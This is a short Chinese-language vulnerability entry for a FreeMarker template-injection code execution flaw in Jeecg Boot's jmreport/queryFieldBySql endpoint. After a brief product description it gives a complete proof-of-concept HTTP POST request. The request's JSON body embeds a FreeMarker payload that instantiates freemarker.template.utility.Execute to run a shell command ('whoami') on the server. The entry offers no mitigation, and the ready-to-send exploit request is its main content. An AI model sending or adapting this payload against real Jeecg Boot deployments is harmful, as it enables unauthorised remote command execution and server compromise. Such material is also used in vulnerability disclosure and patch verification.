漏洞描述
Jeecg Boot(或者称为Jeecg-Boot)是一款基于代码生成器的开源企业级快速开发平台,专注于开发后台管理系统、企业信息管理系统(MIS)等应用。它提供了一系列工具和模板,帮助开发者快速构建和部署现代化的Web 应用程序。攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
Jeecg Boot jmreport/queryFieldBySql 接口代码执行漏洞
PoC代码
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 100
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
{"sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'"}